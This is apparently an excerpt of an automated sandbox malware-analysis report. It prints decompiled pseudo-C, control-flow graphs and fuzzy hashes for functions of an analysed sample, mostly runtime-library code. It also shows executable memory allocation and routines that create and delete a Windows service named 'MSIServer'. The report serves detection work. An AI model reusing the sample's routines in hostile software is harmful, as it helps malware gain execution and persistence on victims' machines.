5e06b4-5e06b8 475->480 476->409 477->478 478->470 479->480 482 5e06ba 480->482 483 5e06c0-5e06c4 480->483 482->483 484 5e06cc-5e06d0 483->484 485 5e06c6 483->485 486 5e06dc-5e06e2 484->486 487 5e06d2-5e06d7 call 5e1208 484->487 485->484 486->406 486->409 487->486
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID: D
                        • API String ID: 0-2746444292
                        • Opcode ID: 8cd8cc798a2efe8840f445c5d2fd0b61a3e98c3acf1e0788f3e7f507e7bdf1a8
                        • Instruction ID: 2e84e3eaf92fbd8066939574ebefebc0f5c167cd065e4b8f862942b099e73fe8
                        • Opcode Fuzzy Hash: 8cd8cc798a2efe8840f445c5d2fd0b61a3e98c3acf1e0788f3e7f507e7bdf1a8
                        • Instruction Fuzzy Hash: E9020170D00249EFDF18DF95C989BADBBB5FF08304F205059E585AA2A1D7B4AA90DF14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010630B6 Relevance: 7.7, APIs: 5, Instructions: 162COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 489 10630b6-10630cf 490 10630d1-10630d6 489->490 491 10630ec 489->491 490->491 492 10630d8-10630da 490->492 493 10630ee-10630f2 491->493 494 10630f3-10630f8 492->494 495 10630dc-10630e1 call 10647cc 492->495 496 1063106-106310a 494->496 497 10630fa-1063104 494->497 507 10630e7 call 106471d 495->507 500 106310c-1063117 call 1066ce0 496->500 501 106311a-106311c 496->501 497->496 499 106312a-1063139 497->499 505 1063140 499->505 506 106313b-106313e 499->506 500->501 501->495 504 106311e-1063128 501->504 504->495 504->499 509 1063145-106314a 505->509 506->509 507->491 511 1063233-1063236 509->511 512 1063150-1063157 509->512 511->493 513 1063198-106319a 512->513 514 1063159-1063161 512->514 515 1063204-1063205 call 1066b25 513->515 516 106319c-106319e 513->516 514->513 517 1063163 514->517 526 106320a-106320e 515->526 519 10631c2-10631cd 516->519 520 10631a0-10631a8 516->520 521 1063261 517->521 522 1063169-106316b 517->522 529 10631d1-10631d4 519->529 530 10631cf 519->530 527 10631aa-10631b6 520->527 528 10631b8-10631bc 520->528 525 1063265-106326e 521->525 523 1063172-1063177 522->523 524 106316d-106316f 522->524 531 106317d-1063196 call 1066c53 523->531 532 106323b-106323f 523->532 524->523 525->493 526->525 533 1063210-1063215 526->533 534 10631be-10631c0 527->534 528->534 529->532 535 10631d6-10631e2 call 1065573 call 1066e85 529->535 530->529 549 10631f9-1063202 531->549 538 1063251-106325c call 10647cc 532->538 539 1063241-106324e call 1066ce0 532->539 533->532 537 1063217-1063228 533->537 534->529 550 10631e7-10631ec 535->550 544 106322b-106322d 537->544 538->507 539->538 544->511 544->512 549->544 551 10631f2-10631f5 550->551 552 1063273-1063277 550->552 551->521 553 10631f7 551->553 552->525 553->549
                        C-Code - Quality: 72%
                        			E010630B6(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				_t124 = _t99;
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E01066CE0(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(__eflags == 0) {
							goto L3;
						} else {
							__eflags = _t97 - (_t74 | 0xffffffff) / _a12;
							if(__eflags > 0) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E01066B25(_t98, _t119, _t119); // executed
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(__eflags != 0) {
													E01066CE0(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E010647CC(__eflags))) = 0x22;
												L4:
												E0106471D();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v8 = _t110 + 1;
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E01065573(_t119)); // executed
											_t88 = E01066E85(); // executed
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E01066C53(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t120 = _t120 + 0x10;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E010647CC(_t124))) = 0x16;
				goto L4;
			}



























                        0x010630c0
                        0x010630c3
                        0x010630c9
                        0x010630cc
                        0x010630cf
                        0x010630ec
                        0x00000000
                        0x010630ec
                        0x010630d1
                        0x010630d6
                        0x00000000
                        0x00000000
                        0x010630d8
                        0x010630da
                        0x010630f3
                        0x010630f6
                        0x010630f8
                        0x01063106
                        0x01063106
                        0x0106310a
                        0x01063112
                        0x01063117
                        0x01063117
                        0x0106311a
                        0x0106311c
                        0x00000000
                        0x0106311e
                        0x01063126
                        0x01063128
                        0x00000000
                        0x00000000
                        0x0106312a
                        0x0106312d
                        0x01063130
                        0x01063137
                        0x01063139
                        0x01063140
                        0x0106313b
                        0x0106313b
                        0x0106313b
                        0x01063145
                        0x01063148
                        0x0106314a
                        0x01063233
                        0x00000000
                        0x01063150
                        0x01063150
                        0x01063150
                        0x01063157
                        0x01063198
                        0x01063198
                        0x0106319a
                        0x01063205
                        0x0106320b
                        0x0106320e
                        0x01063265
                        0x00000000
                        0x0106326b
                        0x01063210
                        0x01063213
                        0x01063215
                        0x0106323b
                        0x0106323b
                        0x0106323f
                        0x01063249
                        0x0106324e
                        0x01063256
                        0x010630e7
                        0x010630e7
                        0x00000000
                        0x010630e7
                        0x01063217
                        0x0106321a
                        0x0106321d
                        0x0106321e
                        0x0106321e
                        0x0106321f
                        0x01063222
                        0x01063225
                        0x01063228
                        0x00000000
                        0x01063228
                        0x0106319c
                        0x0106319e
                        0x010631c2
                        0x010631c7
                        0x010631cd
                        0x010631cf
                        0x010631cf
                        0x010631a0
                        0x010631a2
                        0x010631a8
                        0x010631ba
                        0x010631ba
                        0x010631ba
                        0x010631bc
                        0x010631aa
                        0x010631af
                        0x010631b1
                        0x010631b1
                        0x010631be
                        0x010631be
                        0x010631d1
                        0x010631d4
                        0x00000000
                        0x010631d6
                        0x010631d6
                        0x010631d7
                        0x010631e1
                        0x010631e2
                        0x010631e7
                        0x010631ea
                        0x010631ec
                        0x01063273
                        0x00000000
                        0x01063273
                        0x010631f2
                        0x010631f5
                        0x01063261
                        0x01063261
                        0x01063261
                        0x01063261
                        0x00000000
                        0x01063261
                        0x010631f7
                        0x010631f7
                        0x010631f9
                        0x010631f9
                        0x010631fc
                        0x010631ff
                        0x00000000
                        0x010631ff
                        0x010631d4
                        0x01063159
                        0x0106315c
                        0x0106315f
                        0x01063161
                        0x00000000
                        0x00000000
                        0x01063163
                        0x00000000
                        0x00000000
                        0x01063169
                        0x0106316b
                        0x0106316d
                        0x0106316f
                        0x0106316f
                        0x01063172
                        0x01063175
                        0x01063177
                        0x00000000
                        0x0106317d
                        0x01063184
                        0x01063189
                        0x0106318c
                        0x0106318f
                        0x01063192
                        0x01063194
                        0x00000000
                        0x01063194
                        0x0106322b
                        0x0106322b
                        0x0106322b
                        0x00000000
                        0x01063150
                        0x0106314a
                        0x0106311c
                        0x010630ff
                        0x01063102
                        0x01063104
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01063104
                        0x010630dc
                        0x010630e1
                        0x00000000

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                        • String ID:
                        • API String ID: 1559183368-0
                        • Opcode ID: 1153b4942f2d5611e78c29060ec963a91ba44f1752b9ca033e549a67a1d6f722
                        • Instruction ID: 47125dbbc1637f519ac1ec5c5d3dfcc313eff5748792c674951d0e5a43ac30be
                        • Opcode Fuzzy Hash: 1153b4942f2d5611e78c29060ec963a91ba44f1752b9ca033e549a67a1d6f722
                        • Instruction Fuzzy Hash: 5D51C630A00706DBEB548FAD88846AE7BF9BF51320F148769E9A99E2D0D7719954CBC0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01063294 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 592 1063294-10632a8 call 10668f0 595 10632aa-10632ad 592->595 596 10632db 592->596 595->596 598 10632af-10632b4 595->598 597 10632dd-10632e2 call 1066935 596->597 600 10632b6-10632ba 598->600 601 10632e3-10632fa call 1062e2a call 10630b6 598->601 604 10632bc-10632c8 call 1066ce0 600->604 605 10632cb-10632d6 call 10647cc call 106471d 600->605 613 10632ff-1063315 call 106331d 601->613 604->605 605->596 613->597
                        C-Code - Quality: 89%
                        			E01063294(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t29;
				void* _t32;

				_push(0xc);
				_push(0x107df58);
				E010668F0(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
					L6:
					_t16 = 0;
				} else {
					_t31 =  *((intOrPtr*)(_t32 + 0x18));
					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
						E01062E2A(_t31);
						 *((intOrPtr*)(_t32 - 4)) = 0;
						_t19 = E010630B6( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
						_t29 = _t19;
						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
						E0106331D(_t31);
						_t16 = _t29;
					} else {
						_t40 =  *((intOrPtr*)(_t32 + 0xc)) - 0xffffffff;
						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
							E01066CE0( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
						}
						 *((intOrPtr*)(E010647CC(_t40))) = 0x16;
						E0106471D();
						goto L6;
					}
				}
				return E01066935(_t16);
			}







                        0x01063294
                        0x01063296
                        0x0106329b
                        0x010632a2
                        0x010632a8
                        0x010632db
                        0x010632db
                        0x010632af
                        0x010632af
                        0x010632b4
                        0x010632e4
                        0x010632ea
                        0x010632fa
                        0x01063302
                        0x01063304
                        0x01063307
                        0x0106330e
                        0x01063313
                        0x010632b6
                        0x010632b6
                        0x010632ba
                        0x010632c3
                        0x010632c8
                        0x010632d0
                        0x010632d6
                        0x00000000
                        0x010632d6
                        0x010632b4
                        0x010632e2

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: __lock_file_memset
                        • String ID:
                        • API String ID: 26237723-0
                        • Opcode ID: 660e7f42421c930f9d35f23e008e9f602f5eb58f0c74b561f98cfdfdde28e04b
                        • Instruction ID: a7b20fa9a7e237559376634ebae80b3eda6d96c59bf69738eb373b42816d8b2e
                        • Opcode Fuzzy Hash: 660e7f42421c930f9d35f23e008e9f602f5eb58f0c74b561f98cfdfdde28e04b
                        • Instruction Fuzzy Hash: 6A018F31D0060BEBCF12AFA98C009DE7FA9FF91360F048255F8A85A160D7328622DFD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0106378C Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                        Download Yara Rule

                        Control-flow Graph

                        C-Code - Quality: 87%
                        			E0106378C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				signed int _t14;
				signed int _t23;
				void* _t26;
				intOrPtr _t28;

				_push(0xc);
				_push(0x107df98);
				E010668F0(__ebx, __edi, __esi);
				_t25 =  *((intOrPtr*)(_t26 + 8));
				_t28 =  *((intOrPtr*)(_t26 + 8));
				_t29 = _t28 != 0;
				if(_t28 != 0) {
					E01062E2A(_t25);
					_t4 = _t26 - 4;
					 *_t4 =  *(_t26 - 4) & 0x00000000;
					__eflags =  *_t4;
					_t12 = E01063433(__edx, __edi, _t25, _t25); // executed
					_t23 = _t12;
					 *(_t26 - 0x1c) = _t23;
					 *(_t26 - 4) = 0xfffffffe;
					E010637EC(_t25);
					_t14 = _t23;
				} else {
					 *((intOrPtr*)(E010647CC(_t29))) = 0x16;
					_t14 = E0106471D() | 0xffffffff;
				}
				return E01066935(_t14);
			}








                        0x0106378c
                        0x0106378e
                        0x01063793
                        0x0106379a
                        0x0106379d
                        0x010637a2
                        0x010637a4
                        0x010637bc
                        0x010637c2
                        0x010637c2
                        0x010637c2
                        0x010637c7
                        0x010637cd
                        0x010637cf
                        0x010637d2
                        0x010637d9
                        0x010637de
                        0x010637a6
                        0x010637ab
                        0x010637b6
                        0x010637b6
                        0x010637e5

                        APIs
                        • __lock_file.LIBCMT ref: 010637BC
                        • __ftell_nolock.LIBCMT ref: 010637C7
                          • Part of subcall function 010647CC: __getptd_noexit.LIBCMT ref: 010647CC
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                        • String ID:
                        • API String ID: 2999321469-0
                        • Opcode ID: 1fae35ceade23196b168d64340801d28345714cb9fd911f506f6d290e113dd3d
                        • Instruction ID: 99348cb4e4a86105af53c9876f5a7e3d60a9c2b5716354859623cef72146deaa
                        • Opcode Fuzzy Hash: 1fae35ceade23196b168d64340801d28345714cb9fd911f506f6d290e113dd3d
                        • Instruction Fuzzy Hash: C1E0ED719012139AD7217BB98C017DE76AC7F11330F114285D4A8EF2C0CF7C9A019ADA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 005E0838 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 005E07DA: GetSystemInfo.KERNELBASE(?), ref: 005E07F7
                        • VirtualAllocExNuma.KERNELBASE(00000000), ref: 005E089D
                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: AllocInfoNumaSystemVirtual
                        • String ID:
                        • API String ID: 449148690-0
                        • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                        • Instruction ID: eef30bbf5182586bdb773891708d8b087842e466baa4f46063f59cb891985f61
                        • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                        • Instruction Fuzzy Hash: 2DF0E171D4438ABEEB187BF2480E76D7E68BF80301F50659575C0761C7DAF856808AA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01063B3A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 667 1063b3a-1063b4e call 1063b94
                        C-Code - Quality: 25%
                        			E01063B3A(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t10;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E01063B94(_t4, _t5, _t6, _t7, _t10); // executed
				return _t3;
			}










                        0x01063b3d
                        0x01063b3f
                        0x01063b42
                        0x01063b45
                        0x01063b4e

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: __wfsopen
                        • String ID:
                        • API String ID: 197181222-0
                        • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                        • Instruction ID: b3b70fe317385ef2bd3284bce97538047de10c4a051c8aa9e0d0386026ab8e62
                        • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                        • Instruction Fuzzy Hash: 94B0927244020C77CE012A82EC02B897B1DAB51660F008020FB1C1C1A0A673A66096C9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 005E073A Relevance: 1.3, APIs: 1, Instructions: 60memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 727 5e073a-5e0781 call 5e005f call 5e0073 * 2 VirtualAlloc 734 5e0788-5e0790 727->734 735 5e0783-5e0786 727->735 736 5e07d5-5e07d9 734->736 737 5e0792-5e079f 734->737 735->734 738 5e07a2-5e07a6 737->738 739 5e07be-5e07cf 738->739 740 5e07a8-5e07bc 738->740 739->736 740->738
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 005E0777
                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                        • Instruction ID: 957ec72d34268c20e3d089b30bf160c81effad4bf19c8216b98fa475f6c6bd73
                        • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                        • Instruction Fuzzy Hash: AF113670D00258AFDB04EBA9CC49BAEBBB4FB04304F609495E980B7291D2B15A808F90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 010610B0 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 78servicestringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 81%
                        			E010610B0() {
				short _v548;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t13;
				long _t14;
				void* _t18;
				void* _t27;
				void* _t29;
				void* _t30;

				_t28 = 0;
				_t29 = OpenSCManagerW(0, L"ServicesActive", 2);
				if(_t29 != 0) {
					lstrcpyW(_t30 + GetSystemDirectoryW( &_v548, 0x104) * 2 - 0x220, L"\\msiexec /V");
					_t13 = CreateServiceW(_t29, L"MSIServer", L"MSIServer", 0x10000000, 0x20, 3, 1,  &_v548, 0, 0, 0, 0, 0);
					__eflags = _t13;
					if(_t13 == 0) {
						_t14 = GetLastError();
						__eflags = _t14 - 0x431;
						if(_t14 != 0x431) {
							_push("Failed to create MSI service\n");
							_t18 = E01062E24() + 0x40;
							__eflags = _t18;
							_push(_t18);
							E01062F67(_t27, 0, _t29, _t18);
							_t28 = 1;
						}
						CloseServiceHandle(_t29);
						return _t28;
					} else {
						CloseServiceHandle(_t13);
						CloseServiceHandle(_t29);
						return 0;
					}
				} else {
					_push("Failed to open the service control manager.\n");
					_t24 = E01062E24() + 0x40;
					_push(E01062E24() + 0x40);
					E01062F67(_t27, 0, _t29, _t24);
					_t1 = _t28 + 1; // 0x1
					return _t1;
				}
			}













                        0x010610c2
                        0x010610cb
                        0x010610cf
                        0x0106110f
                        0x0106113c
                        0x01061142
                        0x01061144
                        0x0106115c
                        0x01061162
                        0x01061167
                        0x01061169
                        0x01061173
                        0x01061173
                        0x01061176
                        0x01061177
                        0x0106117f
                        0x0106117f
                        0x01061185
                        0x01061192
                        0x01061146
                        0x01061147
                        0x0106114e
                        0x0106115b
                        0x0106115b
                        0x010610d1
                        0x010610d1
                        0x010610db
                        0x010610de
                        0x010610df
                        0x010610e7
                        0x010610ef
                        0x010610ef

                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000002), ref: 010610C5
                        • _fprintf.LIBCMT ref: 010610DF
                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 010610FC
                        • lstrcpyW.KERNEL32 ref: 0106110F
                        • CreateServiceW.ADVAPI32(00000000,MSIServer,MSIServer,10000000,00000020,00000003,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 0106113C
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 01061147
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 0106114E
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Service$CloseHandle$CreateDirectoryManagerOpenSystem_fprintflstrcpy
                        • String ID: Failed to create MSI service$Failed to open the service control manager.$MSIServer$ServicesActive$\msiexec /V
                        • API String ID: 3223182415-3703814818
                        • Opcode ID: 6003b53990d1e6ea79ad676e2f23aad3e9102bc70a052a5d35b134afddb433e1
                        • Instruction ID: 81df750d754850f02e4f6a74b757f1a360b6ab76bd681e971d473c842beb9781
                        • Opcode Fuzzy Hash: 6003b53990d1e6ea79ad676e2f23aad3e9102bc70a052a5d35b134afddb433e1
                        • Instruction Fuzzy Hash: A5110872F40218B7E73166A9BC0EF9E375CEB84711F000066FE84EA140EAAAD94487F5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010611A0 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 67serviceCOMMON
                        Download Yara Rule
                        C-Code - Quality: 75%
                        			E010611A0(void* __edi) {
				void* __ebx;
				void* __esi;
				long _t4;
				void* _t8;
				int _t10;
				void* _t15;
				void* _t23;
				void* _t28;

				_t21 = 0;
				_t28 = OpenSCManagerW(0, L"ServicesActive", 1);
				if(_t28 != 0) {
					_push(__edi);
					_t23 = OpenServiceW(_t28, L"MSIServer", 0x10000);
					__eflags = _t23;
					if(_t23 == 0) {
						_t4 = GetLastError();
						__eflags = _t4 - 0x424;
						if(_t4 != 0x424) {
							_push("Failed to open MSI service\n");
							_t8 = E01062E24() + 0x40;
							__eflags = _t8;
							_push(_t8);
							E01062F67(0, _t23, _t28, _t8);
							_t21 = 1;
						}
						CloseServiceHandle(_t28);
						return _t21;
					} else {
						_t10 = DeleteService(_t23);
						__eflags = _t10;
						if(_t10 == 0) {
							_push("Failed to delete MSI service\n");
							_t15 = E01062E24() + 0x40;
							__eflags = _t15;
							_push(_t15);
							E01062F67(0, _t23, _t28, _t15);
							_t21 = 1;
						}
						CloseServiceHandle(_t23);
						CloseServiceHandle(_t28);
						return _t21;
					}
				} else {
					_push("Failed to open service control manager\n");
					_t18 = E01062E24() + 0x40;
					_push(E01062E24() + 0x40);
					E01062F67(0, __edi, _t28, _t18);
					_t1 = _t21 + 1; // 0x1
					return _t1;
				}
			}











                        0x010611a9
                        0x010611b2
                        0x010611b6
                        0x010611d4
                        0x010611e6
                        0x010611e8
                        0x010611ea
                        0x01061224
                        0x0106122a
                        0x0106122f
                        0x01061231
                        0x0106123b
                        0x0106123b
                        0x0106123e
                        0x0106123f
                        0x01061247
                        0x01061247
                        0x01061253
                        0x0106125a
                        0x010611ec
                        0x010611ed
                        0x010611f3
                        0x010611f5
                        0x010611f7
                        0x01061201
                        0x01061201
                        0x01061204
                        0x01061205
                        0x0106120d
                        0x0106120d
                        0x01061219
                        0x0106121c
                        0x01061223
                        0x01061223
                        0x010611b8
                        0x010611b8
                        0x010611c2
                        0x010611c5
